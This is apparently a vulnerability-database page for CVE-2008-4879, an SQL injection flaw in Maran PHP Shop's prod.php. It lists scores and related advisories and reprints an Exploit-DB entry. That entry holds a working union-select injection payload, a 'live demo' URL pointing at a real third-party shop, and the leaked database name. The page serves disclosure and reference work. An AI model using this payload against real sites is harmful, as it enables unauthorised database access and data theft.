CVE-2008-4879
published 2008-11-04CVE-2008-4879: SQL injection vulnerability in prod.php in Maran PHP Shop allows remote attackers to execute arbitrary SQL commands via the cat parameter, a different vector…
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.04%
59.6th percentile
SQL injection vulnerability in prod.php in Maran PHP Shop allows remote attackers to execute arbitrary SQL commands via the cat parameter, a different vector than CVE-2008-4880.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-43xj-fv89-3qq5: SQL injection vulnerability in prodshow
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-4880 [HIGH] CWE-89 GHSA-43xj-fv89-3qq5: SQL injection vulnerability in prodshow
SQL injection vulnerability in prodshow.php in Maran PHP Shop allows remote attackers to execute arbitrary SQL commands via the id parameter, a different vector than CVE-2008-4879.
GHSA
GHSA-f29p-6qjp-hxmh: SQL injection vulnerability in prod
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-4879 [HIGH] CWE-89 GHSA-f29p-6qjp-hxmh: SQL injection vulnerability in prod
SQL injection vulnerability in prod.php in Maran PHP Shop allows remote attackers to execute arbitrary SQL commands via the cat parameter, a different vector than CVE-2008-4880.
No detection rules found.
Exploit-DB
Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities
exploitdb·2011-11-28
CVE-2011-4879 Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities
Siemens SIMATIC WinCC Flexible (Runtime) - Multiple Vulnerabilities
---
#######################################################################
Luigi Auriemma
Application: Siemens SIMATIC WinCC flexible (Runtime)
http://www.automation.siemens.com/mcms/human-machine-interface/en/visualization-software/wincc-flexible/wincc-flexible-runtime/Pages/Default.aspx
Versions: 2008 SP2 + security patch 1
Platforms: Windows
Bugs: A] HmiLoad strings stack overflow
B] HmiLoad directory traversal
C] HmiLoad various Denials of Service
D] miniweb directory traversal
E] miniweb arbitrary memory read access
Exploitation: remote
Date: 28 Nov 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2
Exploit-DB
Maran PHP Shop - 'prod.php' SQL Injection
exploitdb·2008-11-02
CVE-2008-4879 Maran PHP Shop - 'prod.php' SQL Injection
Maran PHP Shop - 'prod.php' SQL Injection
---
# Maran PHP Shop (prod.php cat) SQL Injection Vulnerability
# url: http://www.maran.pamil-visions.com/maranshop.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
PoC: /prod.php?cat=7['SQL]
ExP: /prod.php?cat=7+and+1=2++union+all+select+database()--
live demo:
http://www.heimanis.lv/prod.php?cat=7+and+1=2++union+all+select+database()--
output:~$ latvello_heimanis
Hack0wn :D
# milw0rm.com [2008-11-02]
No writeups or analysis indexed.
http://osvdb.org/49532http://securityreason.com/securityalert/4543http://www.securityfocus.com/bid/32044https://exchange.xforce.ibmcloud.com/vulnerabilities/46307https://www.exploit-db.com/exploits/6953http://osvdb.org/49532http://securityreason.com/securityalert/4543http://www.securityfocus.com/bid/32044https://exchange.xforce.ibmcloud.com/vulnerabilities/46307https://www.exploit-db.com/exploits/6953
2008-11-04
Published